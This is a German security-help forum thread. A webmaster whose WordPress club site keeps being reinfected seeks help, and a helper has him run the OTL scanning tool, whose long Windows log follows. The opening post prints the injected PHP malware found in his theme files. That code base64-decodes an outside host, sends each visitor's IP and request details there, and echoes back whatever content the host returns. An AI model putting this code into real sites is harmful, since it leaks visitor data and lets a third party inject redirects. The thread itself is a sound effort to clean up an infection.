Eigene Webseite mit Malware verseucht

martinbu · 18.02.2013, 23:05

Hallo zusammen,

ich kenne das Forum schon länger und bin begeistert von dem Service der hier geboten wird. Jetzt ist es soweit, dass ich selber ein Problem habe, mit dem ich selber nicht mehr weiter komme. Ich hoffe, dass ich hier genauso tolle Hilfe bekomme, wie es viele andere schon bekommen haben.

Ich bin Webmaster einer Internetseite (www.tus-schildgen.de). Schon seit Monaten habe ich immer wieder mit Viren auf der Seite zu kämpfen. Verschiedene Virenmeldungen, die ich im Laufe der letzten Monate von verschiedenen Leuten bekommen habe, hänge ich an. Der Höhepunkt war dann, dass die Webseite auf einen virenverseuchten Fantasyblog (blog.fantasygifts.com) weitergeleitet wurde, hierzu habe ich keine Virenmeldung. Meist konnte ich das Problem lösen, indem ich über FileZilla alle Dateien gelöscht und ersetzt habe, die in der letzten Zeit geändert wurde. Das Passwort habe ich dann auch immer geändert. Allerdings ging das dann immer nur für kurze Zeit gut und die Seite war ein paar Tage später wieder verseucht. Mein Laptop selber ist laut Malwarebytes virenfrei.

Jetzt habe ich mich mal intensiver mit dem Problem beschäftigt. Nun kann ich aktuell die Seite ohne Virenmeldung aufrufen, ich habe AntiVir als Virenscanner installiert.

Im Internet habe ich recherchiert und bin auf folgende Seite gestoßen: hxxp://evuln.com/hacked/redirect.html#1

Im Verlauf meiner weiteren Recherche stieß ich dann noch auf diesen Artikel: hxxp://paid4magazin.de/index.php/base64-eval-php-script-hack-php-trojaner-befallt-webseiten-durch-malware/

Die beiden Seiten, besonders der zweiten Artikel beschreibt genau den Malware-Code, der in den verseuchten Dateien von mir (siehe letztes angehängtes Zitat) vorhanden ist. Betroffen waren verschiedene index.php sowie page.php und footer.php. Diese habe ich alle bereinigt und der Code ist nun in keiner Datei auf der Webseite mehr vorhanden. Ist die Seite jetzt virenfrei?

Ich habe immer die aktuellste Wordpress-Version sowie aktuellste Plugins installiert gehabt. Jedoch nie die Themes aktualisiert, da ich eins selber modifziert hatte. Vielleicht lag hier der Fehler? Jetzt ist die aktuellste Version installiert. Momentan ist zwar noch etwas Chaos, aber das wird noch beseitigt.

Damit liegt das Problem (zumindest das aktuelle, wie es mit den älteren Virenmeldungen aussieht weiß ich nicht) scheinbar auf meinem eigenen Rechner. Malwarebytes zeigt jedoch keine Meldungen an.

Ich hoffe, ich habe soweit alles an Informationen gegeben, die benötigt werden um mir Erste-Hilfe zu leisten. Ziel ist es, die Webseite vollständig virenfrei zu bekommen und auch gegen zukünftige "Angriffe" zu sichern. Gibt es für die verschiedenen Virenmeldungen und das aktuelle Probleme was ich zum Schluss beschrieben habe die selbe Ursache oder handelt es sich um verschiedene Baustellen? Auch die Frage: Kann mir jemand eine Alternative zu FileZilla nennen, da hier ja ebenfalls das Problem liegen könnte? Vielen Dank schon einmal für eure Bemühungen!

Grüße,
Martin

NACHTRAG: Genau dieses Problem scheint schon länger zu bestehen. In einem alten Backup von September 2012 habe ich genau denselben Code gefunden, lediglich mit leichtgeändertem "aHR0[...]"-Schnipsel. Hier schon waren genau dieselben 10 Dateien betroffen wie aktuell auch. Also liegt hier vielleicht wirklich die Ursache für die ganzen Virenmeldungen?

Zitat:

Zitat von Virenmeldung

Kategorie:Intrusion Prevention

Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name der IPS-Warnung,Standardaktionen,Durchgeführte Aktion,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs

25.09.2012 18:34:06,Hoch,Ein Eindringversuch von www.tus-schildgen.de wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Mass Injection Website,Keine Aktion erforderlich,Keine Aktion erforderlich,"www.tus-schildgen.de (80.67.28.124, 80)",www.tus-schildgen.de/,"HASSOPC (xxx.xxx.x.xxx, xxxxx)",xx.xx.xx.xxx (80.67.28.124),"TCP, www-http"

Netzwerkverkehr von <b>www.tus-schildgen.de/</b> entspricht der Signatur eines bekannten Angriffs. Der Angriff wurde von \DEVICE\HARDDISKVOLUME1\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE verursacht.

Zitat:

Zitat von Virenmeldung

angeforderte URL: hxxp://www.tus-schildgen.de/

Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/Blacole.CV

Zitat:

Zitat von Virenmeldung

Angeforderte URL: hxxp://www.tus-schildgen.de/
Information: Enthält Erkennungsmuster des Java-Scriptvirus JS/iFrame.aas

Zitat:

Zitat von Virenverseuchter Code

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

markusg · 18.02.2013, 23:20

hi
hast du denn alle foren, cmfs etc aktualisiert? hab jetzt die seite noch nicht angesehen ist nur mal ein erster Hinweis.
passwort für ftp und sql Datenbank geendert?

martinbu · 18.02.2013, 23:20

Ja, das ist alles heute passiert.

markusg · 18.02.2013, 23:22

Updates, änderungen aller Passwörter etc?
das muss nich nur einmal im Jahr passieren, sondern, wie beim PC auch, sofort bei erscheinen, trage dich dafür in die jeweiligen Newsletter der Hersteller ein.

Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop

Starte bitte die
OTL.exe
.
Vista und Win7 User mit Rechtsklick "als Administrator starten"
Kopiere nun den Inhalt in die
Textbox.

Code:

ATTFilter

activex
netsvcs
msconfig
%SYSTEMDRIVE%\*.
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%systemroot%\*. /mp /s
C:\Windows\system32\*.tsp
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
explorer.exe
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%USERPROFILE%\*.*
%USERPROFILE%\Local Settings\Temp\*.exe
%USERPROFILE%\Local Settings\Temp\*.dll
%USERPROFILE%\Application Data\*.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs
CREATERESTOREPOINT

Schliesse bitte nun alle Programme. (Wichtig)
Klicke nun bitte auf den Quick Scan Button.
Kopiere
nun den Inhalt aus OTL.txt und Extra.txt hier in Deinen Thread

martinbu · 19.02.2013, 00:00

Vielen Dank schon einmal! Teilweise auch regelmäßig, heute aber alle Passwörter geändert und Updates gemacht (daher sieht die Seite auch noch nicht wieder ganz rund aus). Vermutlich war ich hier nicht immer genug hinterher und da lag der Fehler... Hier die beiden Logdateien

[QUOTE=OTL.txt]OTL Logfile:

Code:

ATTFilter

OTL logfile created on: 18.02.2013 23:28:40 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop
Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
1,93 Gb Total Physical Memory | 0,84 Gb Available Physical Memory | 43,54% Memory free
4,10 Gb Paging File | 2,67 Gb Available in Paging File | 65,16% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 222,88 Gb Total Space | 174,72 Gb Free Space | 78,39% Space Free | Partition Type: NTFS
Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32
Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS
Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS
Drive H: | 465,65 Gb Total Space | 206,65 Gb Free Space | 44,38% Space Free | Partition Type: FAT32
 
Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2013.02.18 23:27:47 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\TuS\Desktop\OTL.exe
PRC - [2013.01.09 15:22:08 | 000,389,168 | ---- | M] (Mozilla Corporation) -- C:\Programme\Mozilla Thunderbird\thunderbird.exe
PRC - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) -- C:\Programme\TeamViewer\Version8\TeamViewer_Service.exe
PRC - [2012.10.25 20:26:26 | 000,527,216 | ---- | M] (AnchorFree Inc.) -- C:\Programme\Hotspot Shield\bin\openvpnas.exe
PRC - [2012.10.25 20:24:22 | 000,389,488 | ---- | M] () -- C:\Programme\Hotspot Shield\bin\hsswd.exe
PRC - [2012.10.25 20:20:26 | 000,418,672 | ---- | M] (AnchorFree Inc.) -- C:\Programme\Hotspot Shield\HssWPR\HssSrv.exe
PRC - [2012.08.08 11:47:47 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avgnt.exe
PRC - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\sched.exe
PRC - [2012.05.08 15:52:55 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avshadow.exe
PRC - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Programme\Avira\AntiVir Desktop\avguard.exe
PRC - [2011.09.05 14:10:44 | 000,040,960 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizerHelper.exe
PRC - [2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe
PRC - [2009.04.11 07:27:28 | 000,069,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\conime.exe
PRC - [2009.03.03 12:45:11 | 000,296,400 | ---- | M] () -- C:\Programme\Verbindungsassistent\WTGService.exe
PRC - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) -- C:\Programme\LSI SoftModem\agrsmsvc.exe
PRC - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) -- C:\Windows\System32\AEADISRV.EXE
PRC - [2008.01.19 08:38:38 | 001,008,184 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Defender\MSASCui.exe
PRC - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnetwk.exe
PRC - [2008.01.19 08:33:39 | 000,202,240 | ---- | M] (Microsoft Corporation) -- C:\Programme\Windows Media Player\wmpnscfg.exe
PRC - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2013.02.16 21:25:22 | 012,433,920 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\e64304962098e90f0d3f4c33c1b080a6\System.Windows.Forms.ni.dll
MOD - [2013.01.11 11:57:15 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\f042f66c2ad8fd5b8c34fa22cd22079e\System.Management.ni.dll
MOD - [2013.01.10 20:29:26 | 001,593,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\78157a494dc9a7e52be8840decfcd9cc\System.Drawing.ni.dll
MOD - [2013.01.10 20:27:01 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\cc149d08e75f8c53cd28ac926b38c370\System.ni.dll
MOD - [2013.01.10 20:26:52 | 011,492,352 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\2227d1559f87943255069398608d5c56\mscorlib.ni.dll
MOD - [2013.01.09 15:22:09 | 002,242,096 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\mozjs.dll
MOD - [2013.01.09 15:22:09 | 000,158,256 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldap32v60.dll
MOD - [2013.01.09 15:22:09 | 000,022,576 | ---- | M] () -- C:\Programme\Mozilla Thunderbird\nsldappr32v60.dll
MOD - [2012.11.29 22:59:32 | 000,093,696 | ---- | M] () -- C:\Programme\FileZilla\fzshellext.dll
MOD - [2012.11.21 06:26:34 | 000,008,704 | ---- | M] () -- C:\Users\TuS\AppData\Roaming\Thunderbird\Profiles\oun4j9un.default\extensions\mintrayr@tn123.ath.cx\lib\tray_x86-msvc.dll
MOD - [2012.05.30 19:06:48 | 000,087,912 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2012.05.30 19:06:30 | 001,242,512 | ---- | M] () -- C:\Programme\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2007.09.02 12:58:52 | 000,495,616 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.exe
MOD - [2007.09.02 12:57:36 | 000,069,632 | ---- | M] () -- C:\Programme\RocketDock\RocketDock.dll
 
 
========== Services (SafeList) ==========
 
SRV - [2013.02.08 16:58:20 | 000,251,248 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2013.02.08 16:40:03 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Programme\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) [Auto | Running] -- C:\Programme\TeamViewer\Version8\TeamViewer_Service.exe -- (TeamViewer8)
SRV - [2012.10.25 20:26:26 | 000,527,216 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Programme\Hotspot Shield\bin\openvpnas.exe -- (hshld)
SRV - [2012.10.25 20:24:22 | 000,389,488 | ---- | M] () [Auto | Running] -- C:\Programme\Hotspot Shield\bin\hsswd.exe -- (HssWd)
SRV - [2012.10.25 20:20:26 | 000,418,672 | ---- | M] (AnchorFree Inc.) [Auto | Running] -- C:\Programme\Hotspot Shield\HssWPR\HssSrv.exe -- (HssSrv)
SRV - [2012.10.25 01:06:44 | 000,078,072 | ---- | M] () [On_Demand | Stopped] -- C:\Programme\Hotspot Shield\bin\HSSTrayService.exe -- (HssTrayService)
SRV - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Programme\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2012.05.08 15:53:01 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService)
SRV - [2012.05.08 15:52:54 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Programme\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService)
SRV - [2011.09.05 14:10:44 | 000,040,960 | ---- | M] () [Auto | Running] -- C:\Users\TuS\AppData\Roaming\OCS\SM\SearchAnonymizerHelper.exe -- (SearchAnonymizer)
SRV - [2009.03.03 12:45:11 | 000,296,400 | ---- | M] () [Auto | Running] -- C:\Programme\Verbindungsassistent\WTGService.exe -- (WTGService)
SRV - [2008.08.26 18:02:24 | 000,014,336 | ---- | M] (Agere Systems) [Auto | Running] -- C:\Programme\LSI SoftModem\agrsmsvc.exe -- (AgereModemAudio)
SRV - [2008.05.28 13:27:52 | 000,090,112 | ---- | M] (Andrea Electronics Corporation) [Auto | Running] -- C:\Windows\System32\AEADISRV.EXE -- (AEADIFilters)
SRV - [2008.01.19 08:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Programme\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2008.01.19 08:33:39 | 000,896,512 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Programme\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)
DRV - [2012.10.10 17:30:42 | 000,035,560 | ---- | M] (AnchorFree Inc.) [Kernel | System | Running] -- C:\Windows\System32\drivers\hssdrv6.sys -- (HssDRV6)
DRV - [2012.10.10 17:30:40 | 000,033,512 | ---- | M] (AnchorFree Inc) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\taphss.sys -- (taphss)
DRV - [2012.05.08 15:53:03 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb)
DRV - [2012.05.08 15:53:03 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt)
DRV - [2011.09.16 15:08:07 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr)
DRV - [2009.10.08 15:55:33 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv)
DRV - [2009.08.24 08:14:30 | 000,044,544 | ---- | M] (AzureWave Technologies, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\azvusb.sys -- (azvusb)
DRV - [2009.03.27 06:48:22 | 001,810,992 | ---- | M] () [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\snp2uvc.sys -- (SNP2UVC)
DRV - [2008.11.21 20:53:40 | 001,204,128 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2008.11.17 15:40:22 | 003,668,480 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw5v32.sys -- (NETw5v32)
DRV - [2008.08.07 14:42:12 | 000,025,392 | ---- | M] (Hewlett-Packard Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\hpdskflt.sys -- (hpdskflt)
DRV - [2008.08.07 14:31:52 | 000,034,608 | ---- | M] (Hewlett-Packard Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\Accelerometer.sys -- (Accelerometer)
DRV - [2008.07.24 11:03:56 | 000,101,760 | ---- | M] (Huawei Technologies Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ewusbmdm.sys -- (hwdatacard)
DRV - [2008.04.14 22:39:06 | 000,009,344 | ---- | M] (Hewlett-Packard Development Company, L.P.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CPQBttn.sys -- (HBtnKey)
DRV - [2007.06.14 13:41:00 | 000,466,048 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stk7070P.sys -- (Ltn_stk7070P)
DRV - [2007.06.13 18:30:20 | 000,013,440 | ---- | M] (LITEON) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\Ltn_stkrc.sys -- (Ltn_stkrc)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\..\URLSearchHook: {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\URLSearchHook: {7e111a5c-3d11-4f56-9463-5310c3c69025} - No CLSID value found
IE - HKCU\..\URLSearchHook: {c95a4e8e-816d-4655-8c79-d736da1adb6d} - C:\Programme\Hotspot_Shield\prxtbHots.dll (Conduit Ltd.)
IE - HKCU\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://search.live.com.anonymize-me.de/?anonymto=687474703A2F2F7365617263682E6C6976652E636F6D2F726573756C74732E617370783F713D7B7365617263685465726D737D267372633D7B72656665727265723A736F757263653F7D&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&k=0
IE - HKCU\..\SearchScopes\{426BF4AF-9A6D-4F61-B13B-E7638D4E8A35}: "URL" = hxxp://de.wikipedia.org.anonymize-me.de/?to=64652E77696B6970656469612E6F7267&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{453CCCC2-B564-4517-899E-4FF9C03C456E}: "URL" = hxxp://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT1561552
IE - HKCU\..\SearchScopes\{64DFB864-E327-4243-803B-0E4366F31DBA}: "URL" = hxxp://www.myvideo.de.anonymize-me.de/?to=6D79766964656F2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{83CBD1DC-4276-4D62-86EE-A48FC4B55DE5}: "URL" = hxxp://www.pricerunner.de.anonymize-me.de/?to=707269636572756E6E65722E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{B8EAFF3A-CFA9-4BC8-AA05-15B6CF0BF936}: "URL" = hxxp://search.ebay.de.anonymize-me.de/?to=656261792E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{BA45C28F-538E-4ABA-89B8-6ECE3AF2038E}: "URL" = hxxp://www.otto.de.anonymize-me.de/?to=6F74746F2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\..\SearchScopes\{D2B767CE-7A6C-4E4A-AF76-17F8EE0E1DE1}: "URL" = hxxp://www.amazon.de.anonymize-me.de/?to=616D617A6F6E2E6465&st={searchTerms}&clid=a1056936-d944-4004-b586-578bf9be440a&pid=murb&mode=bounce&k=0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de/"
FF - prefs.js..extensions.enabledAddons: %7BDDC359D1-844A-42a7-9AA1-88A850A938A8%7D:2.0.15
FF - prefs.js..extensions.enabledAddons: FirefoxToolbar%40gutscheindoktor.de:1.8
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:18.0.2
FF - prefs.js..extensions.enabledItems: {ab91efd4-6975-4081-8552-1b3922ed79e2}:1.0.5.1
FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550
FF - prefs.js..extensions.enabledItems: firejump@firejump.net:1.0.2.5
FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:2.0.13
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}:6.0.31
 
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_5_502_149.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.10.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.10.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\linkfilter@kaspersky.ru: C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\FFExt\linkfilter@kaspersky.ru
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.08 16:39:12 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\firejump@firejump.net: C:\Users\TuS\AppData\Roaming\Mozilla\Firefox\Profiles\5j2bf9y8.default\extensions\firejump@firejump.net [2012.04.12 10:27:18 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013.02.08 16:40:09 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 18.0.2\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013.02.08 16:39:12 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2013.01.24 21:00:01 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Thunderbird 17.0.2\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins
 
[2011.02.18 19:21:33 | 000,000,000 | ---D | M] (No name found) -- C:\Users\TuS\AppData\Roaming\mozilla\Extensions
